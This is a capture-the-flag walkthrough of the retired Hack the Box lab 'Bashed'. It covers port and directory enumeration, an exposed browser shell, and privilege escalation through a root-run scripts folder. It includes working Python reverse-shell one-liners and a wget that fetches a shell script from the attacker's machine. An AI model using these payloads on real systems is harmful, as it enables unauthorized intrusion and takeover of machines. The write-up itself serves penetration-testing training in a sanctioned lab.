Today we are going to solve a CTF Challenge “Bashed”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. They have labs which are designed for beginners to the expert penetration testers. Bashed is a Retired Lab.
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!
As these labs are only available online, therefore, they have a static IP. Bashed Lab has IP: 10.10.10.68.
Now, as always let’s begin our hacking with the port enumeration.
C:\Users\jacco>nmap -sC -sV 10.10.10.68 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-03 18:45 W. Europe Summer Time Nmap scan report for 10.10.10.68 Host is up (0.030s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Arrexel's Development Site Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds
Next, we use wfuzz to enumerate the directories and found some important directories such as /dev
c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt http://10.10.10.68/FUZZ ******************************************************** * Wfuzz 2.3.4 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.68/FUZZ Total requests: 220560 ================================================================== ID Response Lines Word Chars Payload ================================================================== 000001: C=200 161 L 397 W 7745 Ch "# directory-list-2.3-medium.txt" 000002: C=200 161 L 397 W 7745 Ch "#" 000003: C=200 161 L 397 W 7745 Ch "# Copyright 2007 James Fisher" 000018: C=404 9 L 32 W 279 Ch "2006" 000019: C=404 9 L 32 W 279 Ch "news" 000013: C=200 161 L 397 W 7745 Ch "#" 000014: C=200 161 L 397 W 7745 Ch "" 000015: C=404 9 L 32 W 280 Ch "index" 000016: C=301 9 L 28 W 311 Ch "images" 000017: C=404 9 L 32 W 283 Ch "download" 000020: C=404 9 L 32 W 280 Ch "crack" 000021: C=404 9 L 32 W 281 Ch "serial" 000022: C=404 9 L 32 W 280 Ch "warez" 000023: C=404 9 L 32 W 279 Ch "full" 000030: C=404 9 L 32 W 277 Ch "11" Finishing pending requests...
c:\PENTEST>wfuzz -c -z file,directory-list-2.3-medium.txt --hc=404 http://10.10.10.68/FUZZ ******************************************************** * Wfuzz 2.3.4 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.68/FUZZ Total requests: 220560 ================================================================== ID Response Lines Word Chars Payload ================================================================== 000001: C=200 161 L 397 W 7745 Ch "# directory-list-2.3-medium.txt" 000002: C=200 161 L 397 W 7745 Ch "#" 000003: C=200 161 L 397 W 7745 Ch "# Copyright 2007 James Fisher" 000013: C=200 161 L 397 W 7745 Ch "#" 000016: C=301 9 L 28 W 311 Ch "images" 000012: C=200 161 L 397 W 7745 Ch "# on atleast 2 different hosts" 000014: C=200 161 L 397 W 7745 Ch "" 000164: C=301 9 L 28 W 312 Ch "uploads" 000338: C=301 9 L 28 W 308 Ch "php" 000550: C=301 9 L 28 W 308 Ch "css" 000834: C=301 9 L 28 W 308 Ch "dev" 000953: C=301 9 L 28 W 307 Ch "js" 002771: C=301 9 L 28 W 310 Ch "fonts" 044769: C= Finishing pending requests...
So when you will open /dev directory in the browser, you will get a link for phpbash.php. Click on that link.
It will redirect to the following page as shown below, which seems like a shell interacting through the browser.
After that, you can execute any os arbitrary command for testing whether it’s working or not. We have run ls command to check the present list in the current directory.
we execute the following command in phpbash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
C:\Users\jacco>nc -lvp 443 listening on [any] 443 ... 10.10.10.68: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 60876: NO_DATA /bin/sh: 0: can't access tty; job control turned off $ python3 -c "import pty; pty.spawn('/bin/bash')" www-data@bashed:/var/www/html/dev$ cd /home cd /home www-data@bashed:/home$ ls ls arrexel scriptmanager www-data@bashed:/home$ cd arrexel cd arrexel www-data@bashed:/home/arrexel$ cat user.txt cat user.txt 2c2*****fc1 www-data@bashed:/home/arrexel$ sudo -l sudo -l Matching Defaults entries for www-data on bashed: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL www-data@bashed:/home/scriptmanager$ sudo -u scriptmanager bash -i sudo -u scriptmanager bash -i scriptmanager@bashed:~$ wget http://10.10.14.20/puckshell.py wget http://10.10.14.20/puckshell.py --2019-04-03 09:35:59-- http://10.10.14.20/puckshell.py Connecting to 10.10.14.20:80... connected. HTTP request sent, awaiting response... 200 OK Length: 213 [text/plain] Saving to: 'puckshell.py' puckshell.py 100%[===================>] 213 --.-KB/s in 0s 2019-04-03 09:35:59 (30.4 MB/s) - 'puckshell.py' saved [213/213] scriptmanager@bashed:~$ cp puckshell.py /scripts/puckshell.py cp puckshell.py /scripts/puckshell.py scriptmanager@bashed:~$ cd /scripts cd /scripts scriptmanager@bashed:/scripts$ ls -la ls -la total 20 drwxrwxr-- 2 scriptmanager scriptmanager 4096 Apr 3 09:43 . drwxr-xr-x 23 root root 4096 Dec 4 2017 .. -rw-r--r-- 1 scriptmanager scriptmanager 213 Apr 3 09:43 puckshell.py -rw-r--r-- 1 scriptmanager scriptmanager 0 Apr 2 08:50 test.py -rw-r--r-- 1 scriptmanager scriptmanager 58 Apr 2 08:50 test.py.bak -rw-r--r-- 1 root root 12 Apr 2 08:50 test.txt scriptmanager@bashed:/scripts$ cat puckshell.py cat puckshell.py import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);scriptmanager@bashed:/scripts$
C:\Users\jacco>nc -lvp 53 listening on [any] 53 ... 10.10.10.68: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 51794: NO_DATA /bin/sh: 0: can't access tty; job control turned off # whoami root # cat /root/root.txt cc4*****8e2 #
Author: Jacco Straathof